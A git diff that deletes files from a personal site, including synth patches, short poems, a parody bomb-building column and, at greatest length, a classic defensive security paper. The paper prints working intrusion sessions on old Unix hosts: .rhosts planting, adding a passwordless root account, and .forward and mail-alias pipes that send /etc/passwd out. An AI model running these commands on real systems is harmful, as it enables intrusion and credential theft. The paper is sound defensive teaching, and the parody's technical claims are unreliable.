diff options
-rw-r--r--fun/music/surge_xt/Patches/Basses/Evolving Bass.fxpbin63883 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Basses/fat metal.fxpbin30962 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Basses/future metal 2.fxpbin30950 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Basses/future metal.fxpbin30955 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Basses/saw meets saw.fxpbin30272 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Basses/wubwub.fxpbin45557 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Chords/Palm Mute.fxpbin30084 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/FX/Bell.fxpbin30387 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/FX/Chirpy.fxpbin30808 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/FX/Talkback.fxpbin30846 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Leads/Electric Squaretar.fxpbin63789 -> 0 bytes
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-rw-r--r--fun/music/surge_xt/Patches/Leads/waveysquare.fxpbin30931 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Leads/weird trumpet.fxpbin30803 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/Laura Palmer.fxpbin30752 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/Music Box.fxpbin30072 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/Rock Organ.fxpbin46088 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/Steel Drum.fxpbin30089 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/Xylophone.fxpbin30735 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/saw trumpet.fxpbin30134 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/slow trumpet.fxpbin30801 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Pads/weird trumpet.fxpbin30169 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Percussion/taiko.fxpbin30689 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Polysynths/Boomer.fxpbin30149 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Polysynths/Xylophone with drums.fxpbin30996 -> 0 bytes
-rw-r--r--fun/music/surge_xt/Patches/Templates/Init Saw.fxpbin30193 -> 0 bytes
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-Old Blog,
diff --git a/.md/fun/poetry/2022/old-men-with-podcasts.txt b/.md/fun/poetry/2022/old-men-with-podcasts.txt
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-old men with podcasts
-did you ever wonder why
-that thing that seems so new and hip
-and 20 years old
-now makes you seem like kind of a tool?
-kinda like poetry
-and don't care
-do my show and i'll do yours
-and no one else will listen
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-A collection of.... notes I guess? In ye old txt format
diff --git a/.md/thoughts/txt/0.txt b/.md/thoughts/txt/0.txt
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-All aphorisms are a subtle attempt at mind control.
diff --git a/.md/thoughts/txt/complexity.txt b/.md/thoughts/txt/complexity.txt
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-Making things complex is actually a rather simple thing to do.
diff --git a/.md/thoughts/txt/dystopia.txt b/.md/thoughts/txt/dystopia.txt
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-One of the surest ways to create a dystopia is to try to make the world
-a better place.
diff --git a/.md/thoughts/txt/old-debates.txt b/.md/thoughts/txt/old-debates.txt
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@@ -1,6 +0,0 @@
-*After watching an old episode of "Firing Line":
- *
-The most depressing thing about watching arguments from the 80s and 90s
-is that we're still arguing about mostly the same stuff. And even using
-the same talking points.
diff --git a/.md/thoughts/txt/on-being-dumb.txt b/.md/thoughts/txt/on-being-dumb.txt
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-Never let the fact that you don't know how to do something stop you from
-doing it.
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-I've noticed a lot of immature people tend to go on and on about how
-much of an adult they are. Maturity, I've found, starts with
-understanding we're all still kids really.
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-My favorite txt files from All credit of course to the
-site owner Jason Scott who thanklessly maintains these historic texts.
-I've changed some of the file names and extensions just so you know what
-you're looking at and your browser doesn't try to download them, but the
-contents are unchanged.
diff --git a/.md/thoughts/txt/ b/.md/thoughts/txt/
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- The following paper is taken from The Journal of Irreproducible Results,
- Volume 25/Number 4/1979-P.O.Box 234 Chicago Heights,Illinois 60411.
-Subscriptions are 1 year for $3.70
- Worldwide controversy has been generated recently from several court
-decisions in the United States which have restricted popular magazines from
-printing articles which describe how to make an atomic bomb. The reason
-usually given by the courts is that national security would be compromised
-if such information were generally available. But, since it is commonly known
-that all of the information is publicly available in most major metropolitan
-libraries, obviously the court's officially stated position is covering up a
-more important factor; namely, that such atomic devices would prove too
-difficult for the average citizen to construct. The United States courts
-cannot afford to insult the vast majorities by insinuating that they do not
-have the intelligence of a cabbage, and thus the "official" press releases
-claim national security as a blanket restriction.
- The rumors that have unfortunately occurred as a result of widespread
-misinformation can (and must) be cleared up now, for the construction project
-this month is the construction of a thermonuclear device, which will hopefully
-clear up any misconceptions you might have about such a project. We will see
-how easy it is to make a device of your very own in ten easy steps, to have and
-hold as you see fit, without annoying interference from the government or the
- The project will cost between $5,000 and $30,000 dollars, depending on how
-fancyyou want the final product to be. Since last week's column, "Let's Make
-a TimeMachine", was received so well in the new step-by-step format, this
-month's column will follow the same format.
-1. First, obtain about 50 pounds (110 kg) of weapons grade Plutonium at your
-local supplier (see NOTE 1). A nuclear power plant is not recommended, as
-large quantities of missing Plutonium tends to make plant engineers unhappy.
-We suggest that you contact your local terrorist organization, or perhaps the
-Junior Achievement in your neighborhood.
-2. Please remember that Plutonium, especially pure, refined Plutonium, is
-somewhat dangarous. Wash your hands with soap and warm water after handling
-the material, and don't allow your children or pets to play in it or eat it.
-Any left over Plutonium dust is excellent as an insect repellant. You may wish
-to keep the substance in a lead box if you can find one in your local junk
-yard, but an old coffee can will do nIcely.
-3. Fashion together a metal enclosure to house the device. Most common
-varieties of sheet metal can be bent to disguise this enclosure as, for
-example, a briefcase, alunch pail, or a Buick. Do not use tinfoil.
-4. Arrange the Plutonium into two hemispheral shapes, separated by about 4
-cm. Use rubber cement to hold thePlutonium dust together. Gelignite is much
-better,but messier to work with. Your helpful hardware man will be happy to
-provide you withthis item.
-6. Pack the TNT around the hemisphere arrangement constructed in step 4. If
-you cannot find Gelignite, feel free to use TNT packed in with Playdo or any
-modeling clay. Colored clay is acceptable, but there is no need to get fancy
-at this point.
-7. Enclose the structure from step 6 into the enclosure made in step 3. Use
-a strong glue such as "Crazy Glue" to bind the hemisphere arrangement against
-the enclosure to prevent accidental detonation which might result from
-vibration or mishandling.
-8. To detonate the device, obtain a radio controlled (RC) servo mechanism, as
-found in RC model airplanes and cars. With a minimum of effort, a remote
-plunger can be made that will strike a detonator cap to effect a small
-explosion. These detonator caps can be found in the electrical supply section
-of your local supermarket. We recommend the "Blast-O-Mactic" brand because
-they are no deposit-no return.
-9. Now hide the completed device from the neighbors and children. The garage
-is not recommended because of high humidity and the extreme range of
-temperatures experienced there. Nuclear devices have been known to
-spontaneousLy detonate in these unstable conditions. The hall closet or under
-the kitchen sink will be perfectly suitable.
-10. Now you are the proud owner of a working thermonuclear device! It is a
-great ice-breaker at parties, and in a pinch, can be used for national defense.
- The device basically works when the detonated TNT compresses the Plutonium
-into a critical mass. The critical mass then produces a nuclear chain reaction
-similar to the domino chain reaction (discussed in this column, "Dominos on the
-March" March, 1968). The chain reaction then promptly produces a big
-thermonuclear reaction. And there you have it, a 10 megaton explosion!
- In next month's column, we will learn how to clone your neighbor's wife in
- six easy steps. This project promises to be an exciting weekend full of fun
-and profit. Common kitchen utensils will be all you need. See you next month!
-1. Plutonium (PU), atomic number 94, is a radioactive metaLlic element formed
-bythe decay of Neptunium and is similar in chemical structure to Uranium,
-Saturium, Jupiternium, and Marsium.
-1. Let's Make Test Tube Babies! May, 1979
-2. Let's Make a Solar System! June, 1979
-3. Let's Make an Economic Recession! July, 1979
-4. Let's Make an Anti-Gravity Machine! August, 1979
-5. Let's Make Contact with an Alien Race! September, 1979
-Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
- \ No newline at end of file
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- 1990 July 12 at 11:17 EDT
- To: David Walker
- FROM: Jeff Sharpe
- I thought this was pretty funny. This is a true IBM ordering
- information quote from one of their catalogues. Pass it on...
- This is an actual alert to IBM Field Engineers that went out to
- all IBM Branch Offices. The person who wrote it was very
- serious. The rest of us may find it rather funny.
- __________________________________________________________________
- Abstract: Mouse Balls Available as FRU (Field Replacement Unit)
- Mouse balls are now available as FRU. Therefore, if a mouse
- fails to operate or should it perform erratically, it may need a
- ball replacement. Because of the delicate nature of this
- procedure, replacement of mouse balls should only be attempted by
- properly trained personnel.
- Before proceeding, determine the type of mouse balls by examining
- the underside of the mouse. Domestic balls will be larger and
- harder than foreign balls. Ball removal procedures differ
- depending upon manufacturer of the mouse. Foreign balls can be
- replaced using the pop-off method. Domestic balls are replaced
- using the twist-off method. Mouse balls are not usually static
- sensitive. However, excessive handling can result in sudden
- discharge. Upon completion of ball replacement, the mouse may be
- used immediately.
- It is recommended that each replacer have a pair of spare balls
- for maintaining optimum customer satisfaction. Any customer
- missing his balls should suspect local personnel of removing
- these necessary items.
- To re-order, specify one of the following:
- P/N 33f8462 - Domestic Mouse Balls
- P/N 33f8461 - Foreign Mouse Balls
- Another file downloaded from: NIRVANAnet(tm)
- & the Temple of the Screaming Electron Jeff Hunter 510-935-5845
- Rat Head Ratsnatcher 510-524-3649
- Burn This Flag Zardoz 408-363-9766
- realitycheck Poindexter Fortran 415-567-7043
- Lies Unlimited Mick Freen 415-583-4102
- Specializing in conversations, obscure information, high explosives,
- arcane knowledge, political extremism, diversive sexuality,
- insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
- Full access for first-time callers. We don't want to know who you are,
- where you live, or what your phone number is. We are not Big Brother.
- "Raw Data for Raw Nerves"
diff --git a/.md/thoughts/txt/ b/.md/thoughts/txt/
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index efd0622..0000000
--- a/.md/thoughts/txt/
+++ /dev/null
@@ -1,58 +0,0 @@
- _oI<LIKE>=vo__
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- "^~DIE/"
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index 653e686..0000000
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-_Improving the Security of Your Site by Breaking Into it_
- Dan Farmer Wietse Venema
- Sun Microsystems Eindhoven University of Technology
- 2550 garcia ave MS PAL1-407 P.O. Box 513, 5600 MB
- Mountain View CA 94043 Eindhoven, NL
-Every day, all over the world, computer networks and hosts are being
-broken into. The level of sophistication of these attacks varies
-widely; while it is generally believed that most break-ins succeed due
-to weak passwords, there are still a large number of intrusions that use
-more advanced techniques to break in. Less is known about the latter
-types of break-ins, because by their very nature they are much harder to
-CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
-Purdue. Sun. You name it, we've seen it broken into. Anything that is
-on the Internet (and many that isn't) seems to be fairly easy game. Are
-these targets unusual? What happened?
-Fade to...
-A young boy, with greasy blonde hair, sitting in a dark room. The room
-is illuminated only by the luminescense of the C64's 40 character
-screen. Taking another long drag from his Benson and Hedges cigarette,
-the weary system cracker telnets to the next faceless ".mil" site on his
-hit list. "guest -- guest", "root -- root", and "system -- manager" all
-fail. No matter. He has all night... he pencils the host off of his
-list, and tiredly types in the next potential victim...
-This seems to be the popular image of a system cracker. Young,
-inexperienced, and possessing vast quantities of time to waste, to get
-into just one more system. However, there is a far more dangerous type
-of system cracker out there. One who knows the ins and outs of the
-latest security auditing and cracking tools, who can modify them for
-specific attacks, and who can write his/her own programs. One who not
-only reads about the latest security holes, but also personally
-discovers bugs and vulnerabilities. A deadly creature that can both
-strike poisonously and hide its tracks without a whisper or hint of a
-trail. The uebercracker is here.
-Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
-uebermensch, or, literally translated into English, "over man."
-Nietzsche used the term not to refer to a comic book superman, but
-instead a man who had gone beyond the incompetence, pettiness, and
-weakness of the everyday man. The uebercracker is therefore the system
-cracker who has gone beyond simple cookbook methods of breaking into
-systems. An uebercracker is not usually motivated to perform random
-acts of violence. Targets are not arbitrary -- there is a purpose,
-whether it be personal monetary gain, a hit and run raid for
-information, or a challenge to strike a major or prestigious site or
-net.personality. An uebercracker is hard to detect, harder to stop, and
-hardest to keep out of your site for good.
-In this paper we will take an unusual approach to system security.
-Instead of merely saying that something is a problem, we will look
-through the eyes of a potential intruder, and show _why_ it is one. We
-will illustrate that even seemingly harmless network services can become
-valuable tools in the search for weak points of a system, even when
-these services are operating exactly as they are intended to.
-In an effort to shed some light on how more advanced intrusions occur,
-this paper outlines various mechanisms that crackers have actually used
-to obtain access to systems and, in addition, some techniques we either
-suspect intruders of using, or that we have used ourselves in tests or
-in friendly/authorized environments.
-Our motivation for writing this paper is that system administrators are
-often unaware of the dangers presented by anything beyond the most
-trivial attacks. While it is widely known that the proper level of
-protection depends on what has to be protected, many sites appear to
-lack the resources to assess what level of host and network security is
-adequate. By showing what intruders can do to gain access to a remote
-site, we are trying to help system administrators to make _informed_
-decisions on how to secure their site -- or not. We will limit the
-discussion to techniques that can give a remote intruder access to a
-(possibly non-interactive) shell process on a UNIX host. Once this is
-achieved, the details of obtaining root privilege are beyond the scope
-of this work -- we consider them too site-dependent and, in many cases,
-too trivial to merit much discussion.
-We want to stress that we will not merely run down a list of bugs or
-security holes -- there will always be new ones for a potential attacker
-to exploit. The purpose of this paper is to try to get the reader to
-look at her or his system in a new way -- one that will hopefully afford
-him or her the opportunity to _understand_ how their system can be
-compromised, and how.
-We would also like to reiterate to the reader that the purpose of this
-paper is to show you how to test the security of your own site, not how
-to break into other people's systems. The intrusion techniques we
-illustrate here will often leave traces in your system auditing logs --
-it might be constructive to examine them after trying some of these
-attacks out, to see what a real attack might look like. Certainly other
-sites and system administrators will take a very dim view of your
-activities if you decide to use their hosts for security testing without
-advance authorization; indeed, it is quite possible that legal action
-may be pursued against you if they perceive it as an attack.
-There are four main parts to the paper. The first part is the
-introduction and overview. The second part attempts to give the reader
-a feel for what it is like to be an intruder and how to go from knowing
-nothing about a system to compromising its security. This section goes
-over actual techniques to gain information and entrance and covers basic
-strategies such as exploiting trust and abusing improperly configured
-basic network services (ftp, mail, tftp, etc.) It also discusses
-slightly more advanced topics, such as NIS and NFS, as well as various
-common bugs and configuration problems that are somewhat more OS or
-system specific. Defensive strategies against each of the various
-attacks are also covered here.
-The third section deals with trust: how the security of one system
-depends on the integrity of other systems. Trust is the most complex
-subject in this paper, and for the sake of brevity we will limit the
-discussion to clients in disguise.
-The fourth section covers the basic steps that a system administrator
-may take to protect her or his system. Most of the methods presented
-here are merely common sense, but they are often ignored in practice --
-one of our goals is to show just how dangerous it can be to ignore basic
-security practices.
-Case studies, pointers to security-related information, and software are
-described in the appendices at the end of the paper.
-While exploring the methods and strategies discussed in this paper we we
-wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
-shell, perl, expect and C, it examines a remote host or set of hosts and
-gathers as much information as possible by remotely probing NIS, finger,
-NFS, ftp and tftp, rexd, and other services. This information includes
-the presence of various network information services as well as
-potential security flaws -- usually in the form of incorrectly setup or
-configured network services, well-known bugs in system or network
-utilities, or poor or ignorant policy decisions. It then can either
-report on this data or use an expert system to further investigate any
-potential security problems. While SATAN doesn't use all of the methods
-that we discuss in the paper, it has succeeded with ominous regularity
-in finding serious holes in the security of Internet sites. It will be
-posted and made available via anonymous ftp when completed; Appendix A
-covers its salient features.
-Note that it isn't possible to cover all possible methods of breaking
-into systems in a single paper. Indeed, we won't cover two of the most
-effective methods of breaking into hosts: social engineering and
-password cracking. The latter method is so effective, however, that
-several of the strategies presented here are geared towards acquiring
-password files. In addition, while windowing systems (X, OpenWindows,
-etc.) can provide a fertile ground for exploitation, we simply don't
-know many methods that are used to break into remote systems. Many
-system crackers use non-bitmapped terminals which can prevent them from
-using some of the more interesting methods to exploit windowing systems
-effectively (although being able to monitor the victim's keyboard is
-often sufficient to capture passwords). Finally, while worms, viruses,
-trojan horses, and other malware are very interesting, they are not
-common (on UNIX systems) and probably will use similar techniques to the
-ones we describe in this paper as individual parts to their attack
-Gaining Information
-Let us assume that you are the head system administrator of Victim
-Incorporated's network of UNIX workstations. In an effort to secure
-your machines, you ask a friendly system administrator from a nearby
-site ( to give you an account on one of her machines so that
-you can look at your own system's security from the outside.
-What should you do? First, try to gather information about your
-(target) host. There is a wealth of network services to look at:
-finger, showmount, and rpcinfo are good starting points. But don't stop
-there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
-and as many other services as you can find. There are so many methods
-and techniques that space precludes us from showing all of them, but we
-will try to show a cross-section of the most common and/or dangerous
-strategies that we have seen or have thought of. Ideally, you would
-gather such information about all hosts on the subnet or area of attack
--- information is power -- but for now we'll examine only our intended
-To start out, you look at what the ubiquitous finger command shows you
-(assume it is 6pm, Nov 6, 1993):
- victim % finger
- []
- Login Name TTY Idle When Where
- zen Dr. Fubar co 1d Wed 08:00
-Good! A single idle user -- it is likely that no one will notice if you
-actually manage to break in.
-Now you try more tactics. As every finger devotee knows, fingering "@",
-"0", and "", as well as common names, such as root, bin, ftp, system,
-guest, demo, manager, etc., can reveal interesting information. What
-that information is depends on the version of finger that your target is
-running, but the most notable are account names, along with their home
-directories and the host that they last logged in from.
-To add to this information, you can use rusers (in particular with the
--l flag) to get useful information on logged-in users.
-Trying these commands on reveals the following information,
-presented in a compressed tabular form to save space:
- Login Home-dir Shell Last login, from where
- ----- -------- ----- ----------------------
- root / /bin/sh Fri Nov 5 07:42 on ttyp1 from
- bin /bin Never logged in
- nobody / Tue Jun 15 08:57 on ttyp2 from
- daemon / Tue Mar 23 12:14 on ttyp0 from
- sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from
- zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from
- sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from
- guest /export/foo /bin/sh Never logged in
- ftp /home/ftp Never logged in
-Both our experiments with SATAN and watching system crackers at work
-have proved to us that finger is one of the most dangerous services,
-because it is so useful for investigating a potential target. However,
-much of this information is useful only when used in conjunction with
-other data.
-For instance, running showmount on your target reveals:
- evil % showmount -e
- export list for
- /export (everyone)
- /var (everyone)
- /usr easy
- /export/exec/kvm/sun4c.sunos.4.1.3 easy
- /export/root/easy easy
- /export/swap/easy easy
-Note that /export/foo is exported to the world; also note that this is
-user guest's home directory. Time for your first break-in! In this
-case, you'll mount the home directory of user "guest." Since you don't
-have a corresponding account on the local machine and since root cannot
-modify files on an NFS mounted filesystem, you create a "guest" account
-in your local password file. As user guest you can put an .rhosts entry
-in the remote guest home directory, which will allow you to login to the
-target machine without having to supply a password.
- evil # mount /foo
- evil # cd /foo
- evil # ls -lag
- total 3
- 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
- 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
- 1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
- evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
- evil # ls -lag
- total 3
- 1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
- 1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
- 1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
- evil # su guest
- evil % echo >> guest/.rhosts
- evil % rlogin
- Welcome to!
- victim %
-If, instead of home directories, were exporting filesystems
-with user commands (say, /usr or /usr/local/bin), you could replace a
-command with a trojan horse that executes any command of your choice.
-The next user to execute that command would execute your program.
-We suggest that filesystems be exported:
-o Read/write only to specific, trusted clients.
-o Read-only, where possible (data or programs can often be
- exported in this manner.)
-If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
-various vendor's machines) or has the netgroups bug (CERT advisory
-91:12), any non-root user with a login name in the target's password
-file can rlogin to the target without a password. And since the user
-"bin" often owns key files and directories, your next attack is to try
-to log in to the target host and modify the password file to let you
-have root access:
- evil % whoami
- bin
- evil % rsh csh -i
- Warning: no access to tty; thus no job control in this shell...
- victim % ls -ldg /etc
- drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
- victim % cd /etc
- victim % mv passwd pw.old
- victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
- victim % ^D
- evil % rlogin -l toor
- Welcome to!
- victim #
-A few notes about the method used above; "rsh csh -i" is used
-to initially get onto the system because it doesn't leave any traces in
-the wtmp or utmp system auditing files, making the rsh invisible for
-finger and who. The remote shell isn't attached to a pseudo-terminal,
-however, so that screen-oriented programs such as pagers and editors
-will fail -- but it is very handy for brief exploration.
-The COPS security auditing tool (see appendix D) will report key files
-or directories that are writable to accounts other than the
-superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
-file permission problems. On many systems, rsh probes as shown above,
-even when successful, would remain completely unnoticed; the tcp wrapper
-(appendix D), which logs incoming connections, can help to expose such
-What now? Have you uncovered all the holes on your target system? Not
-by a long shot. Going back to the finger results on your target, you
-notice that it has an "ftp" account, which usually means that anonymous
-ftp is enabled. Anonymous ftp can be an easy way to get access, as it
-is often misconfigured. For example, the target may have a complete
-copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
-instead of a stripped down version. In this example, though, you see
-that the latter doesn't seem to be true (how can you tell without
-actually examining the file?) However, the home directory of ftp on is writable. This allows you to remotely execute a command
--- in this case, mailing the password file back to yourself -- by the
-simple method of creating a .forward file that executes a command when
-mail is sent to the ftp account. This is the same mechanism of piping
-mail to a program that the "vacation" program uses to automatically
-reply to mail messages.
- evil % cat forward_sucker_file
- "|/bin/mail < /etc/passwd"
- evil % ftp
- Connected to
- 220 victim FTP server ready.
- Name ( ftp
- 331 Guest login ok, send ident as password.
- Password:
- 230 Guest login ok, access restrictions apply.
- ftp> ls -lga
- 200 PORT command successful.
- 150 ASCII data connection for /bin/ls (,1129) (0 bytes).
- total 5
- drwxr-xr-x 4 101 1 512 Jun 20 1991 .
- drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
- drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
- drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
- drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
- 226 ASCII Transfer complete.
- 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
- ftp> put forward_sucker_file .forward
- 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
- ftp> quit
- evil % echo test | mail
-Now you simply wait for the password file to be sent back to you.
-The security auditing tool COPS will check your anonymous ftp setup; see
-the man page for ftpd, the documentation/code for COPS, or CERT advisory
-93:10 for information on how to set up anonymous ftp correctly.
-Vulnerabilities in ftp are often a matter of incorrect ownership or
-permissions of key files or directories. At the very least, make sure
-that ~ftp and all "system" directories and files below ~ftp are owned by
-root and are not writable by any user.
-While looking at ftp, you can check for an older bug that was once
-widely exploited:
- % ftp -n
- ftp> open
- Connected to
- 220 FTP server ready.
- ftp> quote user ftp
- 331 Guest login ok, send ident as password.
- ftp> quote cwd ~root
- 530 Please login with USER and PASS.
- ftp> quote pass ftp
- 230 Guest login ok, access restrictions apply.
- ftp> ls -al / (or whatever)
-If this works, you now are logged in as root, and able to modify the
-password file, or whatever you desire. If your system exhibits this
-bug, you should definitely get an update to your ftpd daemon, either
-from your vendor or (via anon ftp) from
-The wuarchive ftpd, a popular replacement ftp daemon put out by the
-Washington University in Saint Louis, had almost the same problem. If
-your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
-more recent version.
-Finally, there is a program vaguely similar to ftp -- tftp, or the
-trivial file transfer program. This daemon doesn't require any password
-for authentication; if a host provides tftp without restricting the
-access (usually via some secure flag set in the inetd.conf file), an
-attacker can read and write files anywhere on the system. In the
-example, you get the remote password file and place it in your local
-/tmp directory:
- evil % tftp
- tftp> connect
- tftp> get /etc/passwd /tmp/passwd.victim
- tftp> quit
-For security's sake, tftp should not be run; if tftp is necessary, use
-the secure option/flag to restrict access to a directory that has no
-valuable information, or run it under the control of a chroot wrapper
-If none of the previous methods have worked, it is time to go on to more
-drastic measures. You have a friend in rpcinfo, another very handy
-program, sometimes even more useful than finger. Many hosts run RPC
-services that can be exploited; rpcinfo can talk to the portmapper and
-show you the way. It can tell you if the host is running NIS, if it is
-a NIS server or slave, if a diskless workstation is around, if it is
-running NFS, any of the info services (rusersd, rstatd, etc.), or any
-other unusual programs (auditing or security related). For instance,
-going back to our sample target:
- evil % rpcinfo -p [output trimmed for brevity's sake]
- program vers proto port
- 100004 2 tcp 673 ypserv
- 100005 1 udp 721 mountd
- 100003 2 udp 2049 nfs
- 100026 1 udp 733 bootparam
- 100017 1 tcp 1274 rexd
-In this case, you can see several significant facts about our target;
-first of which is that it is an NIS server. It is perhaps not widely
-known, but once you know the NIS domainname of a server, you can get any
-of its NIS maps by a simple rpc query, even when you are outside the
-subnet served by the NIS server (for example, using the YPX program that
-can be found in the comp.sources.misc archives on In
-addition, very much like easily guessed passwords, many systems use
-easily guessed NIS domainnames. Trying to guess the NIS domainname is
-often very fruitful. Good candidates are the fully and partially
-qualified hostname (e.g. "victim" and ""), the organization
-name, netgroup names in "showmount" output, and so on. If you wanted to
-guess that the domainname was "victim", you could type:
- evil % ypwhich -d victim
- Domain victim not bound.
-This was an unsuccessful attempt; if you had guessed correctly it would
-have returned with the host name of's NIS server. However,
-note from the NFS section that is exporting the "/var"
-directory to the world. All that is needed is to mount this directory
-and look in the "yp" subdirectory -- among other things you will see
-another subdirectory that contains the domainname of the target.
- evil # mount /foo
- evil # cd /foo
- evil # /bin/ls -alg /foo/yp
- total 17
- 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
- 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
- 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
- 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
- 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
- [...]
-In this case, "foo_bar" is the NIS domain name.
-In addition, the NIS maps often contain a good list of user/employee
-names as well as internal host lists, not to mention passwords for
-Appendix C details the results of a case study on NIS password files.
-You note that the rpcinfo output also showed that runs rexd.
-Like the rsh daemon, rexd processes requests of the form "please execute
-this command as that user". Unlike rshd, however, rexd does not care if
-the client host is in the hosts.equiv or .rhost files. Normally the rexd
-client program is the "on" command, but it only takes a short C program
-to send arbitrary client host and userid information to the rexd server;
-rexd will happily execute the command. For these reasons, running rexd
-is similar to having no passwords at all: all security is in the client,
-not in the server where it should be. Rexd security can be improved
-somewhat by using secure RPC.
-While looking at the output from rpcinfo, you observe that
-also seems to be a server for diskless workstations. This is evidenced
-by the presence of the bootparam service, which provides information to
-the diskless clients for booting. If you ask nicely, using
-BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
-its NIS domainname. This can be very useful when combined with the fact
-that you can get arbitrary NIS maps (such as the password file) when you
-know the NIS domainname. Here is a sample code snippet to do just that
-(bootparam is part of SATAN.)
- char *server;
- struct bp_whoami_arg arg; /* query */
- struct bp_whoami_res res; /* reply */
- /* initializations omitted... */
- xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
- printf("%s has nisdomain %s\n", server, res.domain_name);
-The showmount output indicated that "easy" is a diskless client of, so we use its client address in the BOOTPARAMPROC_WHOAMI
- evil % bootparam
- has nisdomain foo_bar
-NIS masters control the mail aliases for the NIS domain in question.
-Just like local mail alias files, you can create a mail alias that will
-execute commands when mail is sent to it (a once popular example of this
-is the "decode" alias which uudecodes mail files sent to it.) For
-instance, here you create an alias "foo", which mails the password file
-back to by simply mailing any message to it:
- nis-master # echo 'foo: "| mail < /etc/passwd "' >> /etc/aliases
- nis-master # cd /var/yp
- nis-master # make aliases
- nis-master # echo test | mail -v
-Hopefully attackers won't have control of your NIS master host, but even
-more hopefully the lesson is clear -- NIS is normally insecure, but if
-an attacker has control of your NIS master, then s/he effectively has
-control of the client hosts (e.g. can execute arbitrary commands).
-There aren't many effective defenses against NIS attacks; it is an
-insecure service that has almost no authentication between clients and
-servers. To make things worse, it seems fairly clear that arbitrary
-maps can be forced onto even master servers (e.g., it is possible to
-treat an NIS server as a client). This, obviously, would subvert the
-entire schema. If it is absolutely necessary to use NIS, choosing a
-hard to guess domainname can help slightly, but if you run diskless
-clients that are exposed to potential attackers then it is trivial for
-an attacker to defeat this simple step by using the bootparam trick to
-get the domainname. If NIS is used to propagate the password maps, then
-shadow passwords do not give additional protection because the shadow
-map is still accessible to any attacker that has root on an attacking
-host. Better is to use NIS as little as possible, or to at least
-realize that the maps can be subject to perusal by potentially hostile
-Secure RPC goes a long way to diminish the threat, but it has its own
-problems, primarily in that it is difficult to administer, but also in
-that the cryptographic methods used within are not very strong. It has
-been rumored that NIS+, Sun's new network information service, fixes
-some of these problems, but until now it has been limited to running on
-Suns, and thus far has not lived up to the promise of the design.
-Finally, using packet filtering (at the very least port 111) or
-securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
-all can help.
-The portmapper only knows about RPC services. Other network services
-can be located with a brute-force method that connects to all network
-ports. Many network utilities and windowing systems listen to specific
-ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
-usually on port 6000, etc.) SATAN includes a program that scans the
-ports of a remote hosts and reports on its findings; if you run it
-against our target, you see:
- evil % tcpmap
- Mapping
- port 21: ftp
- port 23: telnet
- port 25: smtp
- port 37: time
- port 79: finger
- port 512: exec
- port 513: login
- port 514: shell
- port 515: printer
- port 6000: (X)
-This suggests that is running X windows. If not protected
-properly (via the magic cookie or xhost mechanisms), window displays can
-be captured or watched, user keystrokes may be stolen, programs executed
-remotely, etc. Also, if the target is running X and accepts a telnet to
-port 6000, that can be used for a denial of service attack, as the
-target's windowing system will often "freeze up" for a short period of
-time. One method to determine the vulnerability of an X server is to
-connect to it via the XOpenDisplay() function; if the function returns
-NULL then you cannot access the victim's display (opendisplay is part of
- char *hostname;
- if (XOpenDisplay(hostname) == NULL) {
- printf("Cannot open display: %s\n", hostname);
- } else {
